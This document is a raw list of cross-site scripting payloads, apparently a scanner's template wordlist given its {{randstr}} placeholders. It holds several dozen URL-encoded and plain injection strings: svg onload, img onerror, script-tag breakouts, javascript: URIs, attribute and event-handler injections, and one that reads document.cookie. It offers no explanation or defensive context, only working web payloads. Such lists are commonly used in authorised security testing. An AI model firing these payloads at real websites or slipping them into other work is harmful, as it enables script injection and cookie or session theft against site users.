--><svg%20onload=alert(document.domain)>
"></iframe>\<svg/onload=alert("{{randstr}}")>
%3C%2Fscript%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E
%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E
%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
"><script>alert(document.domain)</script>
%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

%3Cbody%20onload%3Dalert(1)%3E.jpg
ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6
%3Cimg%20src=x%20onerror=alert(document.domain)%3E
%22%3E%3Cimg%20src%20onerror=alert(document.domain)%20x
">--><script>alert(1)</script>
%3Cimg/src/onerror=alert(document.domain)%3E
%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E
id%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%26
%22/%3E%3Cscript%3Ealert(1);%3C/script%3E
156x%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E
%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e
%0djavascript:alert(1)//%0aaaaaa
javascript:alert(1)
%22%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%40gmail.com
%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E
test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
{alert(1)}
1%22%2balert(document.domain)%2b%22
}}};alert(document.domain)//
"+onmouseover=alert(document.domain)+"
<img+src=x+onerror=alert(document.domain)>
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e
22onfocus%3d%22alert%28document.cookie%29%22autofocus%3d%22
%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
10000&")',10000000);alert(1337);setTimeout('alert("
<a+href="/_">_/%29%7D%29;function+\_\_MobileAppList()%7Balert(1)%7D//>
%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+\_\_MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E
does_not_exist"%22%3E%3Cscript%3Ealert("XSS")%3C/script%3E\<img%20src=x
%27)%3Balert(%22XSS
a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)
index.html?javascript:alert(document.domain)
%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
"<h1xxx"><script>alert(document.domain)</script>
';prompt`document.domain`;//